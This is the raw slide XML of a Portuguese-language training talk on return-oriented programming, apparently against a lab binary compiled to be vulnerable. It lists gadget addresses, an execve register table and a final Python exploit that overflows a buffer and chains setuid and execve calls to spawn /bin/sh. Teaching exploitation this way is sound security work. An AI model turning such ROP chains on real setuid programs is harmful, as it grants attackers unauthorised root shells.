                      <a:endParaRPr lang="en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041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83798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311EFE-1FD0-5E49-AB00-229E339E6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Atribuindo EAX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EF26C-678F-454A-ADE8-9284ED70CD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0x7274047d : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ; ret</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>0x72740501 : add </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, 0xb ; ret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292906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311EFE-1FD0-5E49-AB00-229E339E6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Atribuindo EBX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EF26C-678F-454A-ADE8-9284ED70CD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0x72740375 : pop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ; ret</a:t>
            </a:r>
            <a:endParaRPr lang="en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62D2A1-5CD8-FD44-B006-1545AA332A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0341" y="1174050"/>
            <a:ext cx="7419031" cy="69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434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311EFE-1FD0-5E49-AB00-229E339E6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Atribuindo ECX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EF26C-678F-454A-ADE8-9284ED70CD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0x727404a9 : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ; ret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65268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311EFE-1FD0-5E49-AB00-229E339E6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Atribuindo EDX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EF26C-678F-454A-ADE8-9284ED70CD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0x727404bf : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ; ret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602798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311EFE-1FD0-5E49-AB00-229E339E6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Chamando SYSCALL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EF26C-678F-454A-ADE8-9284ED70CD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0x72740508 # int 0x80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0867117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311EFE-1FD0-5E49-AB00-229E339E6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ROP Chain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EF26C-678F-454A-ADE8-9284ED70CD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0x7274047d # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ; ret</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>0x72740501 # add </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, 0xb ; ret</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>0x72740375 # pop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ; ret</a:t>
            </a:r>
            <a:endParaRPr lang="en-BR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>0x72741008 # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Endereço</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> do /bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sh</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>0x727404a9 # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ; ret</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>0x727404bf # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ; ret</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>0x72740508 # int 0x80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688059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ROP Chain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CDF696-BF6D-2D4A-A9D5-0E3BF85C69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3312"/>
            <a:ext cx="9144000" cy="45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9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675697" y="2661598"/>
            <a:ext cx="2109300" cy="8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700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3A1A99"/>
                </a:solidFill>
                <a:latin typeface="Rubik Medium"/>
                <a:ea typeface="Rubik Medium"/>
                <a:cs typeface="Rubik Medium"/>
                <a:sym typeface="Rubik Medium"/>
              </a:rPr>
              <a:t>Start</a:t>
            </a:r>
            <a:endParaRPr sz="3700" dirty="0">
              <a:solidFill>
                <a:srgbClr val="3A1A9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3209024" y="1933171"/>
            <a:ext cx="5728444" cy="2343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rgbClr val="626262"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="1800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Rubik Light"/>
              </a:rPr>
              <a:t>Entende-se que os passos prévios ao processo de criação do ROP já foram executados: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="626262"/>
              </a:buClr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="1800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Rubik Light"/>
              </a:rPr>
              <a:t>Fuzzing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="626262"/>
              </a:buClr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="1800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Rubik Light"/>
              </a:rPr>
              <a:t>Exploit sobrescrevendo o EIP/RIP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="626262"/>
              </a:buClr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="1800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Rubik Light"/>
              </a:rPr>
              <a:t>PoC - Prova de conceitos</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="626262"/>
              </a:buClr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="pt-BR" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="626262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lvl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="626262"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="pt-BR" sz="1800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Rubik Light"/>
              </a:rPr>
              <a:t>Vamos partir deste ponto em diante!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="84" name="Google Shape;84;p16"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="3070756" y="1800448"/>
            <a:ext cx="0" cy="2609400"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="3A1A9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3429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ROP Chain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96636-0D99-3940-B0E3-D43F4C591F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3312"/>
            <a:ext cx="9144000" cy="45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44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ROP Chain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78E477-59EF-E34A-AE32-190EAC1858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3312"/>
            <a:ext cx="9144000" cy="45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017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ROP Chain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066F49-F098-F742-8051-E251307DA0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3312"/>
            <a:ext cx="9144000" cy="45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592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ROP Chain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1646D9-7C77-F24B-940B-9E2AFC64E9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3312"/>
            <a:ext cx="9144000" cy="45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711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ROP Chain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A86230-1EA3-0941-A20E-A83546B758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3312"/>
            <a:ext cx="9144000" cy="45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969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ROP Chain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61360-89DC-3740-B8A9-EE10A59F26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3312"/>
            <a:ext cx="9144000" cy="45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56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ROP Chain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C9492-58FA-3F4E-B59F-77C4E2526E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3312"/>
            <a:ext cx="9144000" cy="45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831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ROP Chain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83B27-4F4B-014C-A31F-F46130FB99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3312"/>
            <a:ext cx="9144000" cy="45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875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ROP Chain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852FA-6EEF-D74A-AB12-797D163056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3312"/>
            <a:ext cx="9144000" cy="45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120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ROP Chain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AB568D-98C6-954B-B678-43B3D3CA02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3312"/>
            <a:ext cx="9144000" cy="45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27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F74A62-0115-5B46-99AD-C0F3B913F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Hora da maldade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1BB672-0ABE-4543-9983-BAF813C09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BR" dirty="0"/>
              <a:t>Apesar de não fazer parte do escopo da palestra segue os prints passo-a-passo da exploração inicial.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6110361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ROP Chain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C1846-17D0-9E47-864F-15E5614382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3312"/>
            <a:ext cx="9144000" cy="45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749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ROP Chain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C1846-17D0-9E47-864F-15E5614382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3312"/>
            <a:ext cx="9144000" cy="450018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B1F7CDF-39B3-2A44-BC4D-1BB68E4F45EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="139406" y="840124"/>
          <a:ext cx="6035590" cy="2518232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1042190">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2429615074"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2221834">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4050117361"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2771566">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2486591742"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="416198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>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Registrador</a:t>
                      </a:r>
                      <a:endParaRPr lang="en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</a:rPr>
                        <a:t>Valor</a:t>
                      </a:r>
                      <a:endParaRPr lang="en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>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Descrição</a:t>
                      </a:r>
                      <a:endParaRPr lang="en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7845361"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="832396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>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>eax</a:t>
                      </a:r>
                      <a:endParaRPr lang="en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</a:rPr>
                        <a:t>0xb (decimal 11)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en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>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Número</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> do Syscall do </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>execve</a:t>
                      </a:r>
                      <a:endParaRPr lang="en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3521857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ebx</a:t>
                      </a:r>
                      <a:endParaRPr lang="en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>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Ponteiro</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> para o </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>texto</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> /bin/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>sh</a:t>
                      </a:r>
                      <a:endParaRPr lang="en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</a:rPr>
                        <a:t>1 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>parâmetro</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> = pathname = /bin/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>sh</a:t>
                      </a:r>
                      <a:endParaRPr lang="en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9969905"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="416198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ecx</a:t>
                      </a:r>
                      <a:endParaRPr lang="en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>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>0x00</a:t>
                      </a:r>
                      <a:endParaRPr lang="en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</a:rPr>
                        <a:t>2 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>parâmetro</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> = NULL</a:t>
                      </a:r>
                      <a:endParaRPr lang="en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3993728"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="416198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edx</a:t>
                      </a:r>
                      <a:endParaRPr lang="en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</a:rPr>
                        <a:t>0x00</a:t>
                      </a:r>
                      <a:endParaRPr lang="en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</a:rPr>
                        <a:t>3 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>parâmetro</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> = NULL </a:t>
                      </a:r>
                      <a:endParaRPr lang="en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041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4030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F74A62-0115-5B46-99AD-C0F3B913F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Hora da maldade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1BB672-0ABE-4543-9983-BAF813C09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BR" dirty="0"/>
              <a:t>Explorando com ROP!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8462632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F74A62-0115-5B46-99AD-C0F3B913F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Exploit final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1BB672-0ABE-4543-9983-BAF813C09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81307" y="820640"/>
            <a:ext cx="6669086" cy="4196736"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p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#!/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="105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/bin/python2</a:t>
            </a:r>
          </a:p>
          <a:p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# -*- coding: utf-8 -*-</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="105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import sys</a:t>
            </a:r>
          </a:p>
          <a:p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from struct import *</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="105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buffer  = "MTS2020 "</a:t>
            </a:r>
          </a:p>
          <a:p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buffer += "A" * 152</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="105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# ROP Chain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="105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setuid</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="105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buffer += pack('&lt;L', 0x7274047d) # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="105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 ; ret</a:t>
            </a:r>
          </a:p>
          <a:p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buffer += pack('&lt;L', 0x72740526) # add </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="105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, 0x17 ; ret</a:t>
            </a:r>
          </a:p>
          <a:p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buffer += pack('&lt;L', 0x72740493) # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="105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 ; ret</a:t>
            </a:r>
          </a:p>
          <a:p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buffer += pack('&lt;L', 0x72740508) # int 0x80 ; ret</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="105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# ROP Chain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="105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execve</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="105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buffer += pack('&lt;L', 0x7274047d) # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="105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 ; ret</a:t>
            </a:r>
          </a:p>
          <a:p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buffer += pack('&lt;L', 0x72740501) # add </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="105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, 0xb ; ret</a:t>
            </a:r>
          </a:p>
          <a:p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buffer += pack('&lt;L', 0x72740375) # pop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="105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 ; ret</a:t>
            </a:r>
          </a:p>
          <a:p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buffer += pack('&lt;L', 0x72741008) # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="105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Endereço</a:t>
            </a:r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 do /bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="105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endParaRPr lang="en-US" sz="105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buffer += pack('&lt;L', 0x727404a9) # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="105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 ; ret</a:t>
            </a:r>
          </a:p>
          <a:p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buffer += pack('&lt;L', 0x727404bf) # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="105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 ; ret</a:t>
            </a:r>
          </a:p>
          <a:p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buffer += pack('&lt;L', 0x72740508) # int 0x80 ; ret</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="105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0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>print buffer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2339242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1ED2BF-529E-1244-9531-92CC4B66E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Exploit final</a:t>
            </a:r>
            <a:endParaRPr lang="en-BR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F61CE5-3F22-7241-BE7E-AC5D0BE0EF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9705"/>
            <a:ext cx="9144000" cy="119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508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/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1059369" y="2647950"/>
            <a:ext cx="2080106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3A1A99"/>
                </a:solidFill>
                <a:latin typeface="Rubik Medium"/>
                <a:ea typeface="Rubik Medium"/>
                <a:cs typeface="Rubik Medium"/>
                <a:sym typeface="Rubik Medium"/>
              </a:rPr>
              <a:t>Hélvio Junior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3A1A99"/>
                </a:solidFill>
                <a:latin typeface="Rubik Medium"/>
                <a:ea typeface="Rubik Medium"/>
                <a:cs typeface="Rubik Medium"/>
                <a:sym typeface="Rubik Medium"/>
              </a:rPr>
              <a:t>M4v3r1ck</a:t>
            </a:r>
            <a:endParaRPr sz="2200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="3A1A9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3543549" y="2495549"/>
            <a:ext cx="4541065" cy="117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Rubik Light"/>
              </a:rPr>
              <a:t>Contato:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="pt-BR" sz="2200" dirty="0" err="1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Rubik Light"/>
              </a:rPr>
              <a:t>Telegram</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2200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Rubik Light"/>
              </a:rPr>
              <a:t>: @</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2200" dirty="0" err="1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Rubik Light"/>
              </a:rPr>
              <a:t>helviojunior</a:t>
            </a:r>
            <a:endParaRPr lang="pt-BR" sz="2200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="626262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lvl="2"/>
            <a:r>
              <a:rPr lang="pt-BR" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="626262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endParaRPr sz="2300" dirty="0">
              <a:solidFill>
                <a:srgbClr val="626262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147" name="Google Shape;147;p26"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="3318161" y="2352625"/>
            <a:ext cx="0" cy="1514100"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="3A1A9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3ACCAD-26F4-2348-93A3-9FCCED5A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Compilando aplicação vulnerável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3B7B7-3065-024B-9747-EA3206C0F1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56030"/>
            <a:ext cx="9144000" cy="283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1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3ACCAD-26F4-2348-93A3-9FCCED5A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Explorando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7DD2FF-7408-8743-B3E0-81F4D0F0A1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684" y="635625"/>
            <a:ext cx="8000631" cy="10260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39F0A9-281D-4744-9C98-82457E9EE0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645" y="1670428"/>
            <a:ext cx="7998670" cy="362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41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3ACCAD-26F4-2348-93A3-9FCCED5A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Explorando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44E1F0-B350-454A-B88A-4293DBEB6D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27725"/>
            <a:ext cx="9144000" cy="228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922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1130</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>On-screen Show (16:9)</PresentationFormat>
  <Paragraphs>267</Paragraphs>
  <Slides>65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Courier New</vt:lpstr>
      <vt:lpstr>Rubik</vt:lpstr>
      <vt:lpstr>Rubik Light</vt:lpstr>
      <vt:lpstr>Trebuchet MS</vt:lpstr>
      <vt:lpstr>Rubik Medium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Hora da maldade</vt:lpstr>
      <vt:lpstr>Compilando aplicação vulnerável</vt:lpstr>
      <vt:lpstr>Explorando</vt:lpstr>
      <vt:lpstr>Explorando</vt:lpstr>
      <vt:lpstr>Explorando</vt:lpstr>
      <vt:lpstr>Explorando</vt:lpstr>
      <vt:lpstr>Explorando</vt:lpstr>
      <vt:lpstr>Explorando</vt:lpstr>
      <vt:lpstr>Explorando</vt:lpstr>
      <vt:lpstr>Arquivo PoC.py</vt:lpstr>
      <vt:lpstr>Hora da maldade</vt:lpstr>
      <vt:lpstr>Assembly - POP</vt:lpstr>
      <vt:lpstr>POP</vt:lpstr>
      <vt:lpstr>POP</vt:lpstr>
      <vt:lpstr>POP</vt:lpstr>
      <vt:lpstr>Assembly - RET</vt:lpstr>
      <vt:lpstr>Assembly - CALL</vt:lpstr>
      <vt:lpstr>Assembly - CALL</vt:lpstr>
      <vt:lpstr>ROP – Return Oriented Programming</vt:lpstr>
      <vt:lpstr>Código C - Spawn /bin/sh</vt:lpstr>
      <vt:lpstr>SetUID</vt:lpstr>
      <vt:lpstr>https://sec4us.com.br/cheatsheet/shellcoding</vt:lpstr>
      <vt:lpstr>Tabela de valores</vt:lpstr>
      <vt:lpstr>Localizando Gadgets</vt:lpstr>
      <vt:lpstr>Atribuindo EAX</vt:lpstr>
      <vt:lpstr>Atribuindo EBX</vt:lpstr>
      <vt:lpstr>Chamando SYSCALL</vt:lpstr>
      <vt:lpstr>ROP Chain</vt:lpstr>
      <vt:lpstr>ROP Chain</vt:lpstr>
      <vt:lpstr>ROP Chain</vt:lpstr>
      <vt:lpstr>ROP Chain</vt:lpstr>
      <vt:lpstr>ROP Chain</vt:lpstr>
      <vt:lpstr>ROP Chain</vt:lpstr>
      <vt:lpstr>ROP Chain</vt:lpstr>
      <vt:lpstr>ROP Chain</vt:lpstr>
      <vt:lpstr>Spawn /bin/sh</vt:lpstr>
      <vt:lpstr>Tabela de valores</vt:lpstr>
      <vt:lpstr>Atribuindo EAX</vt:lpstr>
      <vt:lpstr>Atribuindo EBX</vt:lpstr>
      <vt:lpstr>Atribuindo ECX</vt:lpstr>
      <vt:lpstr>Atribuindo EDX</vt:lpstr>
      <vt:lpstr>Chamando SYSCALL</vt:lpstr>
      <vt:lpstr>ROP Chain</vt:lpstr>
      <vt:lpstr>ROP Chain</vt:lpstr>
      <vt:lpstr>ROP Chain</vt:lpstr>
      <vt:lpstr>ROP Chain</vt:lpstr>
      <vt:lpstr>ROP Chain</vt:lpstr>
      <vt:lpstr>ROP Chain</vt:lpstr>
      <vt:lpstr>ROP Chain</vt:lpstr>
      <vt:lpstr>ROP Chain</vt:lpstr>
      <vt:lpstr>ROP Chain</vt:lpstr>
      <vt:lpstr>ROP Chain</vt:lpstr>
      <vt:lpstr>ROP Chain</vt:lpstr>
      <vt:lpstr>ROP Chain</vt:lpstr>
      <vt:lpstr>ROP Chain</vt:lpstr>
      <vt:lpstr>ROP Chain</vt:lpstr>
      <vt:lpstr>Hora da maldade</vt:lpstr>
      <vt:lpstr>Exploit final</vt:lpstr>
      <vt:lpstr>Exploit final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Helvio Junior</dc:creator>
  <cp:lastModifiedBy>Helvio Junior</cp:lastModifiedBy>
  <cp:revision>55</cp:revision>
  <cp:lastPrinted>2020-09-10T00:51:08Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-09-09T19:42:24Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-09-10T01:28:23Z</dcterms:modified>
</cp:coreProperties>
</file>